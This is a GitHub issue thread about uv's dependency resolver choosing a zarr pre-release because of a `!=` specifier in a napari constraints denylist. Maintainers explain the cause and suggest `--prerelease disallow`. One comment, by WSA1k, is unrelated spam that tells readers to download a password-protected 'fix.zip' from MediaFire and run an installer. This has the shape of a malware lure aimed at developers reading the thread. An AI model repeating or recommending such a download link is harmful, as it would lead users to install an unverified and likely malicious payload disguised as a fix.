### ISSUE TITLE
Don't enable pre-releases when `!=` is used with pre-release specifier

### ISSUE THREAD

**Issue by Czaki** [astral-sh/uv#6640]
In napari project, we use uv to provide constraints files in automatic jobs 

https://github.com/napari/napari/blob/35a99366f2a8ef5bcdbd6e1f874f5ca2a7572582/.github/workflows/upgrade_test_constraints.yml

In the last run, the output contained bumping zarr to prerelease version

![obraz](https://github.com/user-attachments/assets/c6865750-db80-431b-948f-4470e5c8a72b)

even if we specify only lower bound constraint without any prerelease version: https://github.com/napari/napari/blob/35a99366f2a8ef5bcdbd6e1f874f5ca2a7572582/pyproject.toml#L143

The whole command used for compilation is:

```
uv pip compile --python-version 3.12 --output-file napari_repo/resources/constraints/constraints_py3.12.txt napari_repo/pyproject.toml napari_repo/resources/constraints/version_denylist.txt --extra pyqt5 --extra pyqt6 --extra pyside2 --extra pyside6_experimental --extra testing --extra testing_extra --extra optional
```

Commit showing problem is here [napari/napari@`c81b0d0` (#7212)](https://github.com/napari/napari/pull/7212/commits/c81b0d029abcf654897e0f94f0ed8cd98b3dcb72) 
And problematic line here [napari/napari@`c81b0d0` (#7212)](https://github.com/napari/napari/pull/7212/commits/c81b0d029abcf654897e0f94f0ed8cd98b3dcb72#diff-9a3fb85151bc0704510dd99c7b9ada03b52f6f0f99a44bb34259af2089e2dc8bL549)

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by charliermarsh** [comment]
So, I think the problem is that `zarr!=3.0.0a0` is causing uv to think that pre-releases are acceptable for `zarr`, so it's then picking the newest version of `zarr`, which is `3.0.0a1`.

**Comment by charliermarsh** [comment]
If I remove that line from `napari_repo/resources/constraints/version_denylist.txt`, it works as expected... (Also make sure you remove `resources/constraints/constraints_py3.12.txt` if it exists, since if _that_ contains a pre-release, we'll continue using that pinned version.)

**Comment by Czaki** [comment]
> So, I think the problem is that `zarr!=3.0.0a0` is causing uv to think that pre-releases are acceptable for `zarr`, so it's then picking the newest version of `zarr`, which is `3.0.0a1`.

oh. We are using this file also in pre-release tests. 

I there, any option to provide constraints, but without allowing to enable pre-release? to have a single source of problematic versions?

**Comment by zanieb** [comment]
Does `--prereleases disallow` work? The default is `if-necessary-or-explicit` and these are "explicit" specifiers.

**Comment by charliermarsh** [comment]
Yeah I think `--prerelease disallow` (or `UV_PRERELEASE`, or in your `pyproject.toml`) would be the recommended solution.

**Comment by charliermarsh** [comment]
Interesting, ok, we could change that. What do you think @zanieb? Seems reasonable to me.

**Comment by zanieb** [comment]
I think that's reasonable too, but low priority to change.
